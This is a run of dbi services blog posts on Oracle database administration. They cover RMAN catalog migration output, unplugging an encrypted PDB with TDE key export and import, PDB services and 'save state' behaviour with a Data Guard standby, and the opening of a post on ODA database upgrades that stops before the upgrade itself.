DB1TEST1                       /u01/oradata/DB1TEST11G/sysaux01DB1TEST11G.dbf
DB2TEST1                       /u01/oradata/DB2TEST11G/undotbs01DB2TEST11G.dbf
DB2TEST1                       /u01/oradata/DB2TEST11G/sysaux01DB2TEST11G.dbf
DB1TEST1                       /u01/oradata/DB1TEST11G/undotbs01DB1TEST11G.dbf
DB1TEST1                       /u01/oradata/DB1TEST11G/users01DB1TEST11G.dbf

8 rows selected.

SQL> select DB_KEY, DB_ID, START_TIME, COMPLETION_TIME from RCAT.RC_BACKUP_SET;

    DB_KEY      DB_ID START_TIME          COMPLETION_TIME
---------- ---------- ------------------- -------------------
        42 3287252358 05/01/2018 11:32:00 05/01/2018 11:32:00
        42 3287252358 05/01/2018 11:32:02 05/01/2018 11:32:06
        42 3287252358 05/01/2018 11:32:09 05/01/2018 11:32:10
        42 3287252358 05/01/2018 11:32:12 05/01/2018 11:32:12
        42 3287252358 05/01/2018 15:33:37 05/01/2018 15:33:37
        42 3287252358 05/01/2018 15:33:40 05/01/2018 15:33:45
        42 3287252358 05/01/2018 15:33:47 05/01/2018 15:33:48
        42 3287252358 05/01/2018 15:33:50 05/01/2018 15:33:50
         2   65811618 05/01/2018 11:29:36 05/01/2018 11:29:36
         2   65811618 05/01/2018 11:29:38 05/01/2018 11:29:43
         2   65811618 05/01/2018 11:29:45 05/01/2018 11:29:46
         2   65811618 05/01/2018 11:29:48 05/01/2018 11:29:48
         2   65811618 05/01/2018 15:31:17 05/01/2018 15:31:17
         2   65811618 05/01/2018 15:31:19 05/01/2018 15:31:24
         2   65811618 05/01/2018 15:31:26 05/01/2018 15:31:27
         2   65811618 05/01/2018 15:31:29 05/01/2018 15:31:29
         2   65811618 05/01/2018 15:44:47 05/01/2018 15:44:47
         2   65811618 05/01/2018 15:44:49 05/01/2018 15:44:52
         2   65811618 05/01/2018 15:44:56 05/01/2018 15:44:57
         2   65811618 05/01/2018 15:45:00 05/01/2018 15:45:00
         2   65811618 05/01/2018 15:46:53 05/01/2018 15:46:53
         2   65811618 05/01/2018 15:46:55 05/01/2018 15:47:00
         2   65811618 05/01/2018 15:47:02 05/01/2018 15:47:03
         2   65811618 05/01/2018 15:47:05 05/01/2018 15:47:05

24 rows selected.

 

Checking new backup meta data to be recorded in RCAT12c catalog

Generating a new backup.

oracle@vmreforadg02:/u00/app/oracle/network/admin/ [DB2TEST11G] export NLS_DATE_FORMAT="DD/MM/YYYY HH24:MI:SS"
oracle@vmreforadg02:/u00/app/oracle/network/admin/ [DB2TEST11G] rmanh
Recovery Manager: Release 11.2.0.4.0

RMAN> connect target /

connected to target database: DB2TEST1 (DBID=3287252358)

RMAN> connect catalog rcat/manager@rcat12c

connected to recovery catalog database

RMAN> backup database plus archivelog;

Starting backup at 05/01/2018 15:51:14
current log archived
allocated channel: ORA_DISK_1
channel ORA_DISK_1: SID=32 device type=DISK
channel ORA_DISK_1: starting archived log backup set
channel ORA_DISK_1: specifying archived log(s) in backup set
input archived log thread=1 sequence=32 RECID=1 STAMP=964611118
input archived log thread=1 sequence=33 RECID=2 STAMP=964611131
input archived log thread=1 sequence=34 RECID=3 STAMP=964625616
input archived log thread=1 sequence=35 RECID=4 STAMP=964625629
input archived log thread=1 sequence=36 RECID=5 STAMP=964626674
channel ORA_DISK_1: starting piece 1 at 05/01/2018 15:51:16
channel ORA_DISK_1: finished piece 1 at 05/01/2018 15:51:17
piece handle=/u90/fast_recovery_area/DB2TEST11G/backupset/2018_01_05/o1_mf_annnn_TAG20180105T155116_f4z474b0_.bkp tag=TAG20180105T155116 comment=NONE
channel ORA_DISK_1: backup set complete, elapsed time: 00:00:01
Finished backup at 05/01/2018 15:51:17

Starting backup at 05/01/2018 15:51:17
using channel ORA_DISK_1
channel ORA_DISK_1: starting full datafile backup set
channel ORA_DISK_1: specifying datafile(s) in backup set
input datafile file number=00001 name=/u01/oradata/DB2TEST11G/system01DB2TEST11G.dbf
input datafile file number=00003 name=/u01/oradata/DB2TEST11G/undotbs01DB2TEST11G.dbf
input datafile file number=00002 name=/u01/oradata/DB2TEST11G/sysaux01DB2TEST11G.dbf
input datafile file number=00004 name=/u01/oradata/DB2TEST11G/users01DB2TEST11G.dbf
channel ORA_DISK_1: starting piece 1 at 05/01/2018 15:51:18
channel ORA_DISK_1: finished piece 1 at 05/01/2018 15:51:25
piece handle=/u90/fast_recovery_area/DB2TEST11G/backupset/2018_01_05/o1_mf_nnndf_TAG20180105T155117_f4z476gv_.bkp tag=TAG20180105T155117 comment=NONE
channel ORA_DISK_1: backup set complete, elapsed time: 00:00:07
channel ORA_DISK_1: starting full datafile backup set
channel ORA_DISK_1: specifying datafile(s) in backup set
including current control file in backup set
including current SPFILE in backup set
channel ORA_DISK_1: starting piece 1 at 05/01/2018 15:51:26
channel ORA_DISK_1: finished piece 1 at 05/01/2018 15:51:27
piece handle=/u90/fast_recovery_area/DB2TEST11G/backupset/2018_01_05/o1_mf_ncsnf_TAG20180105T155117_f4z47glg_.bkp tag=TAG20180105T155117 comment=NONE
channel ORA_DISK_1: backup set complete, elapsed time: 00:00:01
Finished backup at 05/01/2018 15:51:27

Starting backup at 05/01/2018 15:51:27
current log archived
using channel ORA_DISK_1
channel ORA_DISK_1: starting archived log backup set
channel ORA_DISK_1: specifying archived log(s) in backup set
input archived log thread=1 sequence=37 RECID=6 STAMP=964626687
channel ORA_DISK_1: starting piece 1 at 05/01/2018 15:51:28
channel ORA_DISK_1: finished piece 1 at 05/01/2018 15:51:29
piece handle=/u90/fast_recovery_area/DB2TEST11G/backupset/2018_01_05/o1_mf_annnn_TAG20180105T155128_f4z47jn7_.bkp tag=TAG20180105T155128 comment=NONE
channel ORA_DISK_1: backup set complete, elapsed time: 00:00:01
Finished backup at 05/01/2018 15:51:29

 

Verifying backup set in new RCAT12c catalog.

oracle@vmtestoradg1:/u01/app/oracle/network/admin/ [RCAT12C] sqh
SQL*Plus: Release 12.2.0.1.0

SQL> select sysdate from dual;

SYSDATE
-------------------
05/01/2018 15:53:16

SQL> select DB_KEY, DB_ID, START_TIME, COMPLETION_TIME from RCAT.RC_BACKUP_SET;

    DB_KEY      DB_ID START_TIME          COMPLETION_TIME
---------- ---------- ------------------- -------------------
        42 3287252358 05/01/2018 11:32:00 05/01/2018 11:32:00
        42 3287252358 05/01/2018 11:32:02 05/01/2018 11:32:06
        42 3287252358 05/01/2018 11:32:09 05/01/2018 11:32:10
        42 3287252358 05/01/2018 11:32:12 05/01/2018 11:32:12
        42 3287252358 05/01/2018 15:33:37 05/01/2018 15:33:37
        42 3287252358 05/01/2018 15:33:40 05/01/2018 15:33:45
        42 3287252358 05/01/2018 15:33:47 05/01/2018 15:33:48
        42 3287252358 05/01/2018 15:33:50 05/01/2018 15:33:50
        42 3287252358 05/01/2018 15:51:16 05/01/2018 15:51:16
        42 3287252358 05/01/2018 15:51:18 05/01/2018 15:51:21
        42 3287252358 05/01/2018 15:51:25 05/01/2018 15:51:26
        42 3287252358 05/01/2018 15:51:28 05/01/2018 15:51:28
         2   65811618 05/01/2018 11:29:36 05/01/2018 11:29:36
         2   65811618 05/01/2018 11:29:38 05/01/2018 11:29:43
         2   65811618 05/01/2018 11:29:45 05/01/2018 11:29:46
         2   65811618 05/01/2018 11:29:48 05/01/2018 11:29:48
         2   65811618 05/01/2018 15:31:17 05/01/2018 15:31:17
         2   65811618 05/01/2018 15:31:19 05/01/2018 15:31:24
         2   65811618 05/01/2018 15:31:26 05/01/2018 15:31:27
         2   65811618 05/01/2018 15:31:29 05/01/2018 15:31:29
         2   65811618 05/01/2018 15:44:47 05/01/2018 15:44:47
         2   65811618 05/01/2018 15:44:49 05/01/2018 15:44:52
         2   65811618 05/01/2018 15:44:56 05/01/2018 15:44:57
         2   65811618 05/01/2018 15:45:00 05/01/2018 15:45:00
         2   65811618 05/01/2018 15:46:53 05/01/2018 15:46:53
         2   65811618 05/01/2018 15:46:55 05/01/2018 15:47:00
         2   65811618 05/01/2018 15:47:02 05/01/2018 15:47:03
         2   65811618 05/01/2018 15:47:05 05/01/2018 15:47:05

28 rows selected.

 

 

 

Cet article ORACLE 11g to 12c RMAN catalog migration est apparu en premier sur Blog dbi services.

Unplug an Encrypted PDB (ORA-46680: master keys of the container database must be exported)


In the Oracle Database Cloud DBaaS you provision a multitenant database where tablespaces are encrypted. This means that when you unplug/plug pluggable databases, you also need to export/import the encryption keys. You cannot just copy the wallet, because the wallet contains all the CDB keys. Usually, you can be guided by the error messages, but this one needs a little explanation and an example.
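Before starting, a quick look at the keystore status in each container can help; a sketch using the standard V$ENCRYPTION_WALLET view:
 
SQL> select con_id, wrl_type, status, wallet_type from v$encryption_wallet;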

Here I’ll unplug PDB6 from CDB1 and plug it into CDB2

[oracle@VM122 blogs]$ connect /@CDB1 as sysdba
SQLcl: Release 17.4.0 Production on Fri Jan 19 22:22:44 2018
Copyright (c) 1982, 2018, Oracle. All rights reserved.
Connected to:
Oracle Database 12c Enterprise Edition Release 12.2.0.1.0 - 64bit Production
 
22:22:46 SQL> show pdbs
 
CON_ID CON_NAME OPEN MODE RESTRICTED
------ ---------- ------------ ----------
2 PDB$SEED READ ONLY NO
3 PDB1 READ WRITE NO
5 PDB6 READ WRITE NO

Here are the master keys:

SQL> select con_id,tag,substr(key_id,1,6)||'...' "KEY_ID...",creator,key_use,keystore_type,origin,creator_pdbname,activating_pdbname from v$encryption_keys;
 
CON_ID TAG KEY_ID... CREATOR KEY_USE KEYSTORE_TYPE ORIGIN CREATOR_PDBNAME ACTIVATING_PDBNAME
------ --- --------- ------- ------- ------------- ------ --------------- ------------------
1 cdb1 AcyH+Z... SYS TDE IN PDB SOFTWARE KEYSTORE LOCAL CDB$ROOT CDB$ROOT
3 pdb6 Adnhnu... SYS TDE IN PDB SOFTWARE KEYSTORE LOCAL PDB6 PDB6

Export keys and Unplug PDB

Let’s try to unplug PDB6:
22:22:51 SQL> alter pluggable database PDB6 close immediate;
Pluggable database PDB6 altered.
 
22:23:06 SQL> alter pluggable database PDB6 unplug into '/var/tmp/PDB6.xml';
 
Error starting at line : 1 in command -
alter pluggable database PDB6 unplug into '/var/tmp/PDB6.xml'
Error report -
ORA-46680: master keys of the container database must be exported

This message is not clear. You don’t export the container database (CDB) key. You have to export the PDB ones.

Then, I have to open the PDB, switch to it, and export the key:

SQL> alter session set container=PDB6;
Session altered.
 
SQL> administer key management set keystore open identified by "k3yCDB1";
Key MANAGEMENT succeeded.
 
SQL> administer key management
2 export encryption keys with secret "this is my secret password for the export"
3 to '/var/tmp/PDB6.p12'
4 identified by "k3yCDB1"
5 /
 
Key MANAGEMENT succeeded.

Note that I opened the keystore with a password. If you use an autologin wallet, you have to close it, in CDB$ROOT, and open it with a password.
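A minimal sketch of that switch, in CDB$ROOT, assuming the same keystore password as above:
 
SQL> administer key management set keystore close;
SQL> administer key management set keystore open identified by "k3yCDB1";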

Now I can unplug the database:

SQL> alter pluggable database PDB6 close immediate;
Pluggable database PDB6 altered.
 
SQL> alter pluggable database PDB6 unplug into '/var/tmp/PDB6.xml';
Pluggable database PDB6 altered.

Plug PDB and Import keys

I’ll plug it in CDB2:

SQL> connect /@CDB2 as sysdba
Connected.
SQL> create pluggable database PDB6 using '/var/tmp/PDB6.xml' file_name_convert=('/CDB1/PDB6/','/CDB2/PDB6/');
Pluggable database PDB6 created.

When I open it, I get a warning:

18:05:45 SQL> alter pluggable database PDB6 open;
ORA-24344: success with compilation error
24344. 00000 - "success with compilation error"
*Cause: A sql/plsql compilation error occurred.
*Action: Return OCI_SUCCESS_WITH_INFO along with the error code
 
Pluggable database PDB6 altered.

The PDB is opened in restricted mode, and then I have to import the keys:

SQL> show pdbs
 
CON_ID CON_NAME OPEN MODE RESTRICTED
------ -------- ---- ---- ----------
2 PDB$SEED READ ONLY NO
6 PDB6 READ WRITE YES
 
SQL> select name,cause,type,status,message,action from pdb_plug_in_violations;
 
NAME CAUSE TYPE STATUS MESSAGE ACTION
---- ----- ---- ------ ------- ------
PDB6 Wallet Key Needed ERROR PENDING PDB needs to import keys from source. Import keys from source.

Then I open the destination CDB wallet and import the PDB keys into it:

SQL> alter session set container=PDB6;
Session altered.
 
SQL> administer key management set keystore open identified by "k3yCDB2";
Key MANAGEMENT succeeded.
 
SQL> administer key management
2 import encryption keys with secret "this is my secret password for the export"
3 from '/var/tmp/PDB6.p12'
4 identified by "k3yCDB2"
5 with backup
6 /
 
Key MANAGEMENT succeeded.

Now the PDB can be opened for all sessions

SQL> alter session set container=CDB$ROOT;
Session altered.
 
SQL> alter pluggable database PDB6 close;
Pluggable database PDB6 altered.
 
SQL> alter pluggable database PDB6 open;
Pluggable database PDB6 altered.

Here is a confirmation that the PDB has the same key as in the origin CDB:

SQL> select con_id,tag,substr(key_id,1,6)||'...' "KEY_ID...",creator,key_use,keystore_type,origin,creator_pdbname,activating_pdbname from v$encryption_keys;
 
CON_ID TAG KEY_ID... CREATOR KEY_USE KEYSTORE_TYPE ORIGIN CREATOR_PDBNAME ACTIVATING_PDBNAME
------ --- --------- ------- ------- ------------- ------ --------------- ------------------
1 cdb2 AdTdo9... SYS TDE IN PDB SOFTWARE KEYSTORE LOCAL CDB$ROOT CDB$ROOT
4 pdb1 Adnhnu... SYS TDE IN PDB SOFTWARE KEYSTORE LOCAL PDB6 PDB6

 

Cet article Unplug an Encrypted PDB (ORA-46680: master keys of the container database must be exported) est apparu en premier sur Blog dbi services.


Multitenant, PDB, ‘save state’, services and standby databases


Creating – and using – your own services has always been the recommendation. You can connect to a database without a service name, through the instance SID, but this is not what you should do. Each database registers its db_unique_name as a service, and you can use it to connect, but it is always better to create your own application service(s). In multitenant, each PDB registers its name as a service, but the recommendation is still there: create your own services, and connect with your services.
I’ll show in this blog post what happens if you use the PDB name as a service and the standby database registers to the same listener as the primary database. Of course, you can workaround the non-unique service names by registering to different listeners. But this just hides the problem. The main reason to use services is to be independent from physical attributes, so being forced to assign a specific TCP/IP port is not better than using an instance SID.

I have the primary (CDB1) and standby (CDB2) databases registered to the default local listener:

LSNRCTL for Linux: Version 12.2.0.1.0 - Production on 03-FEB-2018 23:11:23
 
Copyright (c) 1991, 2016, Oracle. All rights reserved.
 
Connecting to (DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=0.0.0.0)(PORT=1521)))
STATUS of the LISTENER
------------------------
Alias LISTENER
Version TNSLSNR for Linux: Version 12.2.0.1.0 - Production
Start Date 02-FEB-2018 09:32:30
Uptime 1 days 13 hr. 38 min. 52 sec
Trace Level off
Security ON: Local OS Authentication
SNMP OFF
Listener Parameter File /u01/app/oracle/product/12.2.0/dbhome_1/network/admin/listener.ora
Listener Log File /u01/app/oracle/diag/tnslsnr/VM122/listener/alert/log.xml
Listening Endpoints Summary...
(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=0.0.0.0)(PORT=1521)))
(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=VM122)(PORT=5501))(Presentation=HTTP)(Session=RAW))
Services Summary...
Service "627f7512a0452fd4e0537a38a8c055c0" has 2 instance(s).
Instance "CDB1", status READY, has 1 handler(s) for this service...
Instance "CDB2", status READY, has 1 handler(s) for this service...
Service "CDB1" has 1 instance(s).
Instance "CDB1", status READY, has 1 handler(s) for this service...
Service "CDB1XDB" has 1 instance(s).
Instance "CDB1", status READY, has 1 handler(s) for this service...
Service "CDB1_CFG" has 2 instance(s).
Instance "CDB1", status READY, has 1 handler(s) for this service...
Instance "CDB2", status READY, has 1 handler(s) for this service...
Service "CDB1_DGB" has 1 instance(s).
Instance "CDB1", status READY, has 1 handler(s) for this service...
Service "CDB1_DGMGRL" has 1 instance(s).
Instance "CDB1", status UNKNOWN, has 1 handler(s) for this service...
Service "CDB2" has 1 instance(s).
Instance "CDB2", status READY, has 1 handler(s) for this service...
Service "CDB2XDB" has 1 instance(s).
Instance "CDB2", status READY, has 1 handler(s) for this service...
Service "CDB2_DGB" has 1 instance(s).
Instance "CDB2", status READY, has 1 handler(s) for this service...
Service "CDB2_DGMGRL" has 1 instance(s).
Instance "CDB2", status UNKNOWN, has 1 handler(s) for this service...
Service "pdb1" has 2 instance(s).
Instance "CDB1", status READY, has 1 handler(s) for this service...
Instance "CDB2", status READY, has 1 handler(s) for this service...
The command completed successfully

Look at service ‘pdb1’, which is the name for my PDB. Connecting to //localhost:1521/PDB1 can connect you randomly to CDB1 (the primary database) or CDB2 (the standby database).

Here is an example, connecting several times to the PDB1 service:

[oracle@VM122 ~]$ for i in {1..5} ; do sqlplus -L -s sys/oracle@//localhost/pdb1 as sysdba <<< 'select name,open_mode,instance_name from v$instance , v$database;'; done
 
NAME OPEN_MODE INSTANCE_NAME
--------- -------------------- ----------------
CDB1 READ WRITE CDB1
 
NAME OPEN_MODE INSTANCE_NAME
--------- -------------------- ----------------
CDB1 READ ONLY WITH APPLY CDB2
 
NAME OPEN_MODE INSTANCE_NAME
--------- -------------------- ----------------
CDB1 READ WRITE CDB1
 
NAME OPEN_MODE INSTANCE_NAME
--------- -------------------- ----------------
CDB1 READ ONLY WITH APPLY CDB2
 
NAME OPEN_MODE INSTANCE_NAME
--------- -------------------- ----------------
CDB1 READ WRITE CDB1

I was connected at random to CDB1 or CDB2.

As an administrator, you know the instance names and you can connect to the one you want with: //localhost:1521/PDB1/CDB1 or //localhost:1521/PDB1/CDB2:

[oracle@VM122 ~]$ for i in {1..3} ; do sqlplus -L -s sys/oracle@//localhost/pdb1/CDB1 as sysdba <<< 'select name,open_mode,instance_name from v$instance , v$database;'; done
 
NAME OPEN_MODE INSTANCE_NAME
--------- -------------------- ----------------
CDB1 READ WRITE CDB1
 
NAME OPEN_MODE INSTANCE_NAME
--------- -------------------- ----------------
CDB1 READ WRITE CDB1
 
NAME OPEN_MODE INSTANCE_NAME
--------- -------------------- ----------------
CDB1 READ WRITE CDB1
 
[oracle@VM122 ~]$ for i in {1..3} ; do sqlplus -L -s sys/oracle@//localhost/pdb1/CDB2 as sysdba <<< 'select name,open_mode,instance_name from v$instance , v$database;'; done
 
NAME OPEN_MODE INSTANCE_NAME
--------- -------------------- ----------------
CDB1 READ ONLY WITH APPLY CDB2
 
NAME OPEN_MODE INSTANCE_NAME
--------- -------------------- ----------------
CDB1 READ ONLY WITH APPLY CDB2
 
NAME OPEN_MODE INSTANCE_NAME
--------- -------------------- ----------------
CDB1 READ ONLY WITH APPLY CDB2

Of course this is not what you want. And we must not start or stop the default services. For the application, the best you can do is to create your own service. And if you want to be able to connect to the Active Data Guard standby, which is opened read-only, then you can create a ‘read-write’ service and a ‘read-only’ service that you start depending on the role.

Create and Start a read-write service on the primary

This example supposes that you have only Oracle Database software installed. If you are in RAC, with the resources managed by Grid Infrastructure, or simply with Oracle Restart, creating a service is easy with srvctl, and you add it to a PDB with ‘-pdb’ and also with a role to start it automatically in the primary or in the standby. But without it, you use dbms_service:

SQL> connect /@CDB1 as sysdba
Connected.
 
SQL> alter session set container=pdb1;
Session altered.
 
SQL> exec dbms_service.create_service(service_name=>'pdb1_RW',network_name=>'pdb1_RW');
PL/SQL procedure successfully completed.
 
SQL> exec dbms_service.start_service(service_name=>'pdb1_RW');
PL/SQL procedure successfully completed.
 
SQL> alter session set container=cdb$root;
Session altered.

The service is created, stored in SERVICE$ visible with DBA_SERVICES:

SQL> select name,name_hash,network_name,creation_date,pdb from cdb_services order by con_id,service_id;
NAME NAME_HASH NETWORK_NAME CREATION_DATE PDB
---- --------- ------------ ------------- ---
pdb1_RW 3128030313 pdb1_RW 03-FEB-18 PDB1
pdb1 1888881990 pdb1 11-JAN-18 PDB1
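
If the databases were managed by Grid Infrastructure or Oracle Restart, as mentioned above, the same service could be declared with srvctl instead of dbms_service, with the role deciding where it starts. This is only a hedged sketch (check the exact srvctl options of your version):

srvctl add service -db CDB1 -service pdb1_RW -pdb pdb1 -role PRIMARY
srvctl start service -db CDB1 -service pdb1_RW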

Save state

I have created and started the pdb1_RW service. However, if I restart the database, the service will not start automatically. How do you ensure that the PDB1 pluggable database opens automatically when you restart the CDB? You ‘save state’ while it is open. It is the same for the services you create: you need to ‘save state’ while they are started.


SQL> alter pluggable database all save state;
Pluggable database ALL altered.

The information is stored in PDB_SVC_STATE$, and I’m not aware of a dictionary view on it:

SQL> select name,name_hash,network_name,creation_date,con_id from v$active_services order by con_id,service_id;
 
NAME NAME_HASH NETWORK_NAME CREATION_DATE CON_ID
---- --------- ------------ ------------- ------
pdb1_RW 3128030313 pdb1_RW 03-FEB-18 4
pdb1 1888881990 pdb1 11-JAN-18 4
 
SQL> select * from containers(pdb_svc_state$);
 
INST_ID INST_NAME PDB_GUID PDB_UID SVC_HASH SPARE1 SPARE2 SPARE3 SPARE4 SPARE5 SPARE6 CON_ID
------- --------- -------- ------- -------- ------ ------ ------ ------ ------ ------ ------
1 CDB1 627F7512A0452FD4E0537A38A8C055C0 2872139986 3128030313 1

The service name is not stored in this table: you have to join with v$services using (name_hash) to resolve it. Here are all the active services of the CDB:

SQL> select name,name_hash,network_name,creation_date,con_id from v$active_services order by con_id,service_id;
 
NAME NAME_HASH NETWORK_NAME CREATION_DATE CON_ID
---- --------- ------------ ------------- ------
SYS$BACKGROUND 165959219 26-JAN-17 1
SYS$USERS 3427055676 26-JAN-17 1
CDB1_CFG 1053205690 CDB1_CFG 24-JAN-18 1
CDB1_DGB 184049617 CDB1_DGB 24-JAN-18 1
CDB1XDB 1202503288 CDB1XDB 11-JAN-18 1
CDB1 1837598021 CDB1 11-JAN-18 1
pdb1 1888881990 pdb1 11-JAN-18 4
pdb1_RW 3128030313 pdb1_RW 03-FEB-18 4

So, in addition to storing the PDB state in PDBSTATE$, visible with dba_pdb_saved_states, the service state is also stored. Note that they are at different levels: PDBSTATE$ is a data link, stored in CDB$ROOT only (because the data must be read before opening the PDB), whereas PDB_SVC_STATE$ is a local table in the PDB, as the services can be started only when the PDB is opened.
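
The PDB saved state itself can be checked from the CDB root with its dictionary view:

SQL> select * from dba_pdb_saved_states;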

This new service is immediately registered on CDB1:

Service "pdb1" has 2 instance(s).
Instance "CDB1", status READY, has 1 handler(s) for this service...
Instance "CDB2", status READY, has 1 handler(s) for this service...
Service "pdb1_RW" has 1 instance(s).
Instance "CDB1", status READY, has 1 handler(s) for this service...
The command completed successfully

Create and Start a read-only service for the standby

If you try to do the same on the standby for a pdb1_RO service, you cannot, because the service information has to be stored in the dictionary, which is read-only there:

SQL> exec dbms_service.create_service(service_name=>'pdb1_RO',network_name=>'pdb1_RO');
 
Error starting at line : 56 File @ /media/sf_share/122/blogs/pdb_svc_standby.sql
In command -
BEGIN dbms_service.create_service(service_name=>'pdb1_RO',network_name=>'pdb1_RO'); END;
Error report -
ORA-16000: database or pluggable database open for read-only access

So, the read-only service has to be created on the primary:

SQL> connect /@CDB1 as sysdba
Connected.
SQL> alter session set container=pdb1;
Session altered.
 
SQL> exec dbms_service.create_service(service_name=>'pdb1_RO',network_name=>'pdb1_RO');
 
SQL> select name,name_hash,network_name,creation_date,pdb from cdb_services order by con_id,service_id;
NAME NAME_HASH NETWORK_NAME CREATION_DATE PDB
---- --------- ------------ ------------- ---
pdb1_RW 3128030313 pdb1_RW 03-FEB-18 PDB1
pdb1_RO 1562179816 pdb1_RO 03-FEB-18 PDB1
pdb1 1888881990 pdb1 11-JAN-18 PDB1

The SERVICE$ dictionary table is replicated to the standby, so I can start it on the standby:

SQL> connect /@CDB2 as sysdba
Connected.
SQL> alter session set container=pdb1;
Session altered.
 
SQL> exec dbms_service.start_service(service_name=>'pdb1_RO');
PL/SQL procedure successfully completed.

Here is what is registered to the listener:

Service "pdb1" has 2 instance(s).
Instance "CDB1", status READY, has 1 handler(s) for this service...
Instance "CDB2", status READY, has 1 handler(s) for this service...
Service "pdb1_RO" has 1 instance(s).
Instance "CDB2", status READY, has 1 handler(s) for this service...
Service "pdb1_RW" has 1 instance(s).
Instance "CDB1", status READY, has 1 handler(s) for this service...
The command completed successfully

Now, pdb1_RO connects to the standby and pdb1_RW to the primary. Perfect.

No ‘save state’ on the standby

At this point, you would like to have pdb1_RO started automatically when PDB1 is opened on the standby, but ‘save state’ is impossible on a read-only database:

SQL> alter session set container=cdb$root;
Session altered.
 
SQL> alter pluggable database all save state;
 
Error starting at line : 84 File @ /media/sf_share/122/blogs/pdb_svc_standby.sql
In command -
alter pluggable database all save state
Error report -
ORA-16000: database or pluggable database open for read-only access

You can’t manage the state (open the PDB, start the services) in the standby database.

The primary ‘save state’ is replicated to the standby

For the moment, everything is ok with my services:

Service "pdb1_RO" has 1 instance(s).
Instance "CDB2", status READY, has 1 handler(s) for this service...
Service "pdb1_RW" has 1 instance(s).
Instance "CDB1", status READY, has 1 handler(s) for this service...

If I restart the primary CDB1, everything is ok again because I saved the state of the PDB and the service. But what happens when the standby CDB2 restarts?


SQL> connect /@CDB2 as sysdba
Connected.
SQL> startup force;
...
SQL> show pdbs
 
CON_ID CON_NAME OPEN MODE RESTRICTED
---------- ------------------------------ ---------- ----------
2 PDB$SEED READ ONLY NO
4 PDB1 MOUNTED

The PDB is not opened: the PDB ‘saved state’ is not applied on the standby.
However, when I open the PDB manually, it seems that the service ‘saved state’ is applied, and this one was replicated from the primary:

SQL> alter pluggable database PDB1 open;
Pluggable database altered.
SQL> host lsnrctl status
...
Service "pdb1" has 2 instance(s).
Instance "CDB1", status READY, has 1 handler(s) for this service...
Instance "CDB2", status READY, has 1 handler(s) for this service...
Service "pdb1_RW" has 2 instance(s).
Instance "CDB1", status READY, has 1 handler(s) for this service...
Instance "CDB2", status READY, has 1 handler(s) for this service...
The command completed successfully

My pdb1_RW service is now registered for both instances: connections will land at random on the primary or the standby, and transactions will fail half of the time. It will be the same after a switchover. This is not correct.

Save state instances=()

What I would like is the possibility to save state for a specific DB_UNIQUE_NAME, as we can do for PDB ‘spfile’ parameters. But this is not possible. What is possible is to mention an instance with the instances=() clause, but you can use it only for the instance where you run the ‘save state’ (otherwise you get ORA-65110: Invalid instance name specified), and anyway this would no longer be correct after a switchover.

So what?

Be careful with services and ensure that the services used by the application are registered only for the correct instance, and that this remains true when the instances are restarted. For this you must link a service name to a database role, which cannot be done correctly with ‘save state’. You can use startup triggers or, better, Grid Infrastructure service resources.
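
Here is a minimal sketch of such a startup trigger, created inside PDB1 so that it fires when the PDB is opened, and using the service names of this demo. It only illustrates the idea and is not a complete solution:

create or replace trigger pdb1_start_role_services
after startup on database
declare
  v_role varchar2(30);
begin
  select database_role into v_role from v$database;
  if v_role = 'PRIMARY' then
    dbms_service.start_service('pdb1_RW');
  else
    -- physical standby opened read-only (Active Data Guard)
    dbms_service.start_service('pdb1_RO');
  end if;
end;
/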

Do not connect to the default service with the PDB name: you cannot remove it and cannot stop it, so the same service name is offered by different instances in a Data Guard configuration. You can register the standby instances to different local listeners to avoid the confusion, but they may still register to the same SCAN listener.

Create your own services, start them depending on the database role, and do not use ‘save state’ in a physical standby configuration.

 

Cet article Multitenant, PDB, ‘save state’, services and standby databases est apparu en premier sur Blog dbi services.

One command database upgrade on ODA


Oracle 12.2 has finally arrived on ODA and is now available on all generations. Modern ODAs now support the 11.2.0.4, 12.1.0.2 and 12.2.0.1 database engines, and these 3 versions can work together without any problem.

You probably plan to upgrade some old databases to the latest engine, at least those still running on 11.2. As you may know, 11.2 has been out of Premier Support since January 2015: it’s time to think about an upgrade. Note that Premier Support for 12.1 will end in July 2018, so running 11.2 and 12.1 databases will require Extended Support this year. And Extended Support is not free, as you can imagine. There is one exception for 11.2.0.4: Oracle is offering Extended Support to its customers until the end of 2018.

Database upgrades have always been a lot of work, and often paired with a platform change. You need to recreate the databases, the tablespaces, export and import the data with datapump, correct the problems, and so on. Sometimes you can restore the old database to the new server with RMAN, but it’s only possible if the old engine is supported on your brand new server/OS combination.

As ODA is a longer-term platform, you can think about upgrading the database directly on the appliance. A few years ago you would have been using dbua or catupgrd, but the latest ODA package now includes a tool for a one-command database upgrade. Let’s try it!

odacli, the ODA Command Line Interface, has a new option: upgrade-database. Parameters are very limited:

[root@oda-dbi01 2018-02-19]# odacli upgrade-database -h
Usage: upgrade-database [options]
Options:
--databaseids, -i
Database IDs to be upgraded
Default: []
* --destDbHomeId, -to
DB HOME ID of the destination
--help, -h
get help
--json, -j
json output
--sourceDbHomeId, -from
DB HOME ID of the source

You need to provide the database identifier (ODA keeps a repository of all databases, db homes and jobs in a JavaDB/Derby database) and the identifier of the destination db home you want to upgrade to. The source db home id is optional, as Oracle can determine it quite easily. There are no other options (for the moment): no pre-upgrade backup (which would be advisable) and no storage migration (switching between ACFS and ASM), for example.

Imagine you have an 11.2.0.4 database you want to upgrade to 12.2.0.1. Look for the id of your database ODAWS11:

[root@oda-dbi01 2018-02-19]# odacli list-databases

ID                                       DB Name    DB Type  DB Version           CDB        Class    Shape    Storage    Status        DbHomeID
---------------------------------------- ---------- -------- -------------------- ---------- -------- -------- ---------- ------------ ----------------------------------------
45ce9de7-3115-45b0-97b0-1384b8401e69     ODAWS      Si       12.2.0.1             false      OLTP     odb2     ASM        Configured   1ca87df9-4691-47ed-90a9-2a794128539d
a948a32c-1cf2-42c8-88c6-88fd9463b297     DBTEST1    Si       12.2.0.1             false      OLTP     odb1s    ACFS       Configured   1ca87df9-4691-47ed-90a9-2a794128539d
de281792-1904-4536-b42c-8a55df489b73     ODAWS11    Si       11.2.0.4             false      OLTP     odb2     ACFS       Configured   72023166-a39c-4a93-98b7-d552029b2eea

Note that this database is configured with ACFS, as 11.2 databases cannot be stored directly in 12c ASM.

You can only upgrade this database to an existing db home: if you want to upgrade it to a new home, create that home first, for example:

[root@oda-dbi01 2018-02-19]# odacli create-dbhome -v 12.1.0.2.171017

If you want to use an existing home, just pick the db home id, for example here the one used by ODAWS database.

Let’s do the upgrade:

